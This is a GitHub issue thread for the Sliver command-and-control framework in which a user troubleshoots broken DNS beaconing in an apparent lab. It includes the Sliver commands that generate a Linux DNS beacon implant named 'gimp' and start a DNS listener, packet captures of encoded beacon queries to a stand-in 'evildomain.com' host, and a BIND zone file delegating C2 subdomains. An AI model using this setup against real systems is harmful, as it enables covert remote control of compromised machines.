### ISSUE TITLE
DNS C2 still broken?

### ISSUE THREAD

**Issue by mragusa** [BishopFox/sliver#1546]
I have configured sliver to use DNS c2 and I am seeing query refused and then servfail errors that result in broken communication

**To Reproduce**
1. generate --dns beacon.evildomain.com. --canary control.evildomain.com. --os linux --save gimp
2. dns -d beacon.evildomain.com.,control.evildomain.com.
3. run /root/gimp on victim lab PC

13:38:25.253631 IP 10.36.200.152.42976 > 10.36.200.151.domain: 38025+ A? U3ZA8BzLM5AhwT73ssm9.beacon.evildomain.com. (60)
13:38:25.253699 IP 10.36.200.151.59081 > 10.36.200.150.domain: 14913 A? U3ZA8BzLM5AhwT73ssm9.beacon.evildomain.com. (60)
13:38:25.253805 IP 10.36.200.150.domain > 10.36.200.151.59081: 14913*- 1/0/0 A 109.187.184.238 (118)
13:38:25.253866 IP 10.36.200.151.domain > 10.36.200.152.42976: 38025 1/0/0 A 109.187.184.238 (76)
13:38:25.255037 IP 10.36.200.152.38090 > 10.36.200.151.domain: 37152+ TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:25.255139 IP 10.36.200.151.45861 > 10.36.200.150.domain: 39522 NS? 8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (77)
13:38:25.255298 IP 10.36.200.150.domain > 10.36.200.151.45861: 39522 NXDomain*- 0/0/0 (77)
13:38:25.255404 IP 10.36.200.151.53600 > 10.36.200.150.domain: 33445 TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:25.255862 IP 10.36.200.150.domain > 10.36.200.151.53600: 33445 Refused*- 0/0/0 (269)
13:38:25.255931 IP 10.36.200.151.domain > 10.36.200.152.38090: 37152 ServFail 0/0/0 (269)
13:38:26.256142 IP 10.36.200.152.51764 > 10.36.200.151.domain: 5244+ TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:26.256411 IP 10.36.200.151.60514 > 10.36.200.150.domain: 7419 NS? 8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (77)
13:38:26.256790 IP 10.36.200.150.domain > 10.36.200.151.60514: 7419 NXDomain*- 0/0/0 (77)
13:38:26.256949 IP 10.36.200.151.36894 > 10.36.200.150.domain: 19339 TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:26.257397 IP 10.36.200.150.domain > 10.36.200.151.36894: 19339 Refused*- 0/0/0 (269)
13:38:26.257536 IP 10.36.200.151.domain > 10.36.200.152.51764: 5244 ServFail 0/0/0 (269)
13:38:27.257770 IP 10.36.200.152.51491 > 10.36.200.151.domain: 38701+ TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:27.258022 IP 10.36.200.151.58777 > 10.36.200.150.domain: 50718 NS? 8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (77)
13:38:27.258432 IP 10.36.200.150.domain > 10.36.200.151.58777: 50718 NXDomain*- 0/0/0 (77)
13:38:27.258581 IP 10.36.200.151.59409 > 10.36.200.150.domain: 25802 TXT? Y1uvqjyj8uQNy3sESuA6NugSqDr8if3mebNNdpYUcwuYktKH8FSe2M5ZA2L42X6.pqqhUaMvMi5fpXdrcdiAXYZ2mX9K2bh3FaLVRtzwqBcL7ASaSNFR1Rpvxntcn8d.QZHZs3PbzSJjcAhLwjvPJj11XkDwtpgnSibRgZ7zG5oEa2vu3nwFnbfjfLLrqJw.8PVmHVeL4NZTHxtAvErUbgj2agT8eXWfFAsdU.beacon.evildomain.com. (269)
13:38:27.259054 IP 10.36.200.150.domain > 10.36.200.151.59409: 25802 Refused*- 0/0/0 (269)
13:38:27.259154 IP 10.36.200.151.domain > 10.36.200.152.51491: 38701 ServFail 0/0/0 (269)

13:46:13.188142 IP 10.36.200.152.34209 > 10.36.200.151.domain: 44309+ [1au] A? control.evildomain.com. (63)
13:46:13.188400 IP 10.36.200.151.47155 > 10.36.200.150.domain: 48008 A? control.evildomain.com. (40)
13:46:13.188638 IP 10.36.200.150.domain > 10.36.200.151.47155: 48008 NXDomain*- 0/0/0 (40)
13:46:13.188744 IP 10.36.200.151.domain > 10.36.200.152.34209: 44309 NXDomain 0/0/1 (79)

root@c2:~# cat /etc/debian_version 
12.4

sliver > version

[*] Client v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b - linux/amd64
    Compiled at 2023-07-11 17:31:11 -0400 EDT
    Compiled with go version go1.20.5 linux/amd64

[*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b - linux/amd64
    Compiled at 2023-07-11 17:31:10 -0400 EDT

BIND 9.18.19-1~deb12u1-Debian (Extended Support Version) 
# cat db.evildomain 
$TTL    600
$ORIGIN evildomain.com.
@       IN      SOA     ns.evildomain.com. root.evildomain.com. (
                             12         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                          86400 )       ; Negative Cache TTL

@       IN      NS      ns.evildomain.com.
ns      IN      A       10.36.200.151
@       IN      A       10.36.200.150

ns1     IN      A       10.36.200.150
beacon  IN      NS      ns1.evildomain.com.
control IN      NS      ns1.evildomain.com.

Canary feature does not alert either.

Am I doing something wrong or is this a similar bug from before ?

**Comment by mragusa** [comment]
sliver > canaries

 Sliver Name             Domain                            Triggered   First Trigger   Latest Trigger 
======================= ================================= =========== =============== ================
 AVAILABLE_MASTICATION   vw7ocwh.control.evildomain.com.   false       Never           Never          
 WHITE_KALE              h7l9wtx.control.evildomain.com.   false       Never           Never     

# dig h7l9wtx.control.evildomain.com.

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> h7l9wtx.control.evildomain.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26638
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 5131469a8920a949010000006599a32d37a8532ba3ae0379 (good)
;; QUESTION SECTION:
;h7l9wtx.control.evildomain.com.        IN      A

;; Query time: 176 msec
;; SERVER: 10.36.200.151#53(10.36.200.151) (UDP)
;; WHEN: Sat Jan 06 13:59:59 EST 2024
;; MSG SIZE  rcvd: 87



13:59:57.742999 IP 10.36.200.152.54587 > 10.36.200.151.domain: 26638+ [1au] A? h7l9wtx.control.evildomain.com. (71)
13:59:57.743294 IP 10.36.200.151.47842 > 10.36.200.150.domain: 55490 [1au] A? h7l9wtx.control.evildomain.com. (71)
13:59:57.743835 IP 10.36.200.150.domain > 10.36.200.151.47842: 55490 NXDomain*- 0/0/0 (48)

**Comment by mragusa** [comment]
duplicate issue currently being worked on
